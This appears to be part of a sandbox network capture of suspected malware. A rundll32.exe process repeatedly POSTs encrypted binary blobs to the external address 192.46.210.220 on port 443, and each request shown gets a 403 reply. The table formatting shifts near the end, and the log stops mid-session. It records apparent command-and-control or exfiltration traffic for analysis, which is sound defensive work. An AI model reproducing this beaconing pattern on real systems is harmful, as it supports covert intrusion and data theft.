2021-10-28 03:06:07 UTC | 340 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:07 UTC | 340 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:08 UTC | 345 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49772 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:00 UTC | 34 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:00 UTC | 34 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:01 UTC | 39 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
70 | 192.168.2.3 | 50100 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:11 UTC | 345 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:11 UTC | 346 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:12 UTC | 355 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
71 | 192.168.2.3 | 50101 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:11 UTC | 350 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:11 UTC | 350 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:12 UTC | 355 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
72 | 192.168.2.3 | 50108 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:15 UTC | 355 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:15 UTC | 355 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:16 UTC | 365 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:16 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 192.168.2.3 | 50109 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:15 UTC | 360 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:15 UTC | 360 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:16 UTC | 365 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:16 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.3 | 50116 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:19 UTC | 365 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:19 UTC | 365 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:20 UTC | 375 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
75 | 192.168.2.3 | 50117 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:19 UTC | 370 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:19 UTC | 370 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:20 UTC | 375 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
76 | 192.168.2.3 | 50124 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:23 UTC | 375 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:23 UTC | 375 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:24 UTC | 385 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
77 | 192.168.2.3 | 50125 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:23 UTC | 380 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:23 UTC | 380 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:24 UTC | 385 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:23 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
78 | 192.168.2.3 | 50132 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:27 UTC | 385 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:27 UTC | 385 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:27 UTC | 395 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
79 | 192.168.2.3 | 50133 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:27 UTC | 390 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:27 UTC | 390 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:28 UTC | 395 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:28 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49778 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:04 UTC | 39 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:04 UTC | 39 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:05 UTC | 44 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        80192.168.2.350140192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:31 UTC395OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:31 UTC395OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:06:31 UTC, kBytes transferred: 404, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:31 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 81, Source IP: 192.168.2.3, Source Port: 50141, Destination IP: 192.46.210.220, Destination Port: 443, Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:06:31 UTC, kBytes transferred: 400, Direction: OUT, Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
